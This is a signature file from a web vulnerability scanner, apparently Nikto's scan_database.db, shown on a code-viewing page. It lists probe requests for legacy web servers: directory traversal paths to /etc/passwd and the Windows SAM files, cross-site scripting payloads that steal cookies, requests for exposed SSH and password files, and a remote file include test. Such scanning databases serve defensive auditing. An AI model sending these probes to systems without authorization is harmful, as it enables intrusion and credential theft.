📄 scan_database.db
字号:
"dwhttpd","/ab2/@AdminViewError","200","GET","Sun Answerbook allows viewing of the error logs without authentication.""generic","/","PeopleSoft, Inc","GET","PeopleSoft appears to be running.""generic","/","samba is configured to deny","GET","Samba-swat web server. Used to administer Samba.""generic","/","TRACE / HTTP/1.","TRACE","TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details""generic","/","TRACK / HTTP/1.","TRACK","TRACK option ('TRACE' alias) appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details""generic","/%00","File Name","GET","Appending /%00 to a request to the web server may reveal a directory listing.""generic","/%00/","Directory listing of","GET","Remote directories can be retrieved, (this may be a Roxen server), upgrade the server.""generic","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","<script>alert(\"Vulnerable\")</script>","GET","Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.""generic","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","root:","GET","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).""generic","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]","GET","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.""generic","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.""generic","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.""generic","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.""generic","/%3f.jsp","Directory Listing","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.""generic","/%3f.jsp","Index of","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.""generic","/<script>alert('Vulnerable');</script>","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to cross site scripting (XSS) with HTML-encoded requests. CA-2000-02.""generic","/.%252e/.%252e/.%252e/winnt/boot.ini","boot loader","GET","JWalk Web server allows any file to be retrieved from the remote system.""generic","/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.""generic","/................../etc/passwd","root:","GET","The web server allows the password file to be retrieved.""generic","/.../.../.../.../.../.../.../.../.../boot.ini","boot loader","GET","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?""generic","/../../../../../../../../../../etc/passwd","root:","GET","It is possible to read files on the server by adding ../ in front of file name.""generic","/../webserver.ini","Authentic","GET","Nuca WebServer allows retrieval of the web server configuration.""generic","/..\..\..\..\..\..\temp\temp.class","200","GET","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.""generic","/./","include\(\"","GET","Appending '/./' to a directory may reveal php source code.""generic","/.access","200","GET","Contains authorization information""generic","/.addressbook","200","GET","PINE addressbook, may store sensitive e-mail address contact information and notes""generic","/.bashrc","200","GET","User home dir was found with a shell rc file. This may reveal file and path information.""generic","/.bash_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.""generic","/.cobalt/sysManage/../admin/.htaccess","AuthName","GET","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.""generic","/.forward","200","GET","User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.""generic","/.history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.""generic","/.htaccess","200","GET","Contains authorization information""generic","/.htpasswd","200","GET","Contains authorization information""generic","/.lynx_cookies","200","GET","User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.""generic","/.mysql_history","200","GET","Database SQL?""generic","/.passwd","200","GET","Contains authorization information""generic","/.pinerc","200","GET","User home dir found with a PINE rc file. May reveal system information, directories and more.""generic","/.plan","200","GET","User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol ""generic","/.proclog","200","GET","User home dir with a Procmail log file. May reveal user mail traffic, directories and more.""generic","/.procmailrc","200","GET","User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more.""generic","/.profile","200","GET","User home dir with a shell profile was found. May reveal directory information and system configuration.""generic","/.rhosts","200","GET","A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.""generic","/.sh_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.""generic","/.ssh","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.""generic","/.ssh/authorized_keys","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.""generic","/.ssh/known_hosts","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.""generic","////./../.../boot.ini","boot loader","GET","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details.""generic","///etc/hosts","200","GET","The server install allows reading of any system file by adding an extra '/' to the URL.""generic","///etc/passwd","root:","GET","The server install allows reading of any system file by adding an extra '/' to the URL.""generic","//admin/admin.shtml","200","GET","Axis network camera may allow admin bypass by using double-slashes before URLs.""generic","//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.""generic","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.""generic","/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/<script>alert('Vulnerable')</script>.aspx","<script>alert('Vulnerable')</script>","GET","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.""generic","/<script>alert('Vulnerable')</script>.jsp","<script>alert('Vulnerable')</script>.jsp","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/<script>alert('Vulnerable')</script>.shtml","<script>alert('Vulnerable')</script>.shtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/<script>alert('Vulnerable')</script>.thtml","<script>alert('Vulnerable')</script>.thtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/?mod=<script>alert(document.cookie)</script>&op=browse","<script>alert(document.cookie)","GET","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/?mod=node&nid=some_thing&op=view","/node.module.php","GET","Sage 1.0b3 may reveal system paths with invalid module names.""generic","/?mod=some_thing&op=browse","in /","GET","Sage 1.0b3 reveals system paths with invalid module names.""generic","/?pattern=/etc/*&sort=name","passwd","GET","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.""generic","/?sql_debug=1","SQL query: ","GET","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.""generic","/a%5c.aspx","Invalid file name for monitoring:","GET","Older Microsoft .NET installations allow full path disclosure.""generic","/a.jsp/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.""generic","/a/","200","GET","May be Kebi Web Mail administration menu.""generic","/a?<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.""generic","/accounts/getuserdesc.asp","200","GET","Hosting Controller 2002 administration page is available. This should be protected.""generic","/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","http://xxxxxxxxxx/atk/","GET","Achievo can be made to include php files from another domain. Upgrade to a new version.""generic","/active.log","WEBactive Http Server","GET","The WebActive log is accessible remotely.""generic","/add.php","Failed opening '","GET","Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages.""generic","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ""generic","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","<script>alert(Vulnerable)</script>","GET","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -